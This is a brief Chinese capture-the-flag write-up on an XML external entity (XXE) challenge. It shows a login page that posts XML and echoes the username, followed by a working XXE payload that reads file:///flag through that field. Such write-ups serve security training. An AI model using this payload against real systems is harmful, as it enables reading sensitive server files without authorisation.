最后更新于3年前
XXE
打开就是登录界面,抓包,是XML
会回显username,直接进行XXE注入
<!DOCTYPE ANY [ <!ENTITY test SYSTEM "file:///flag"> ]> <user><username>&test;</username><password>123</password></user>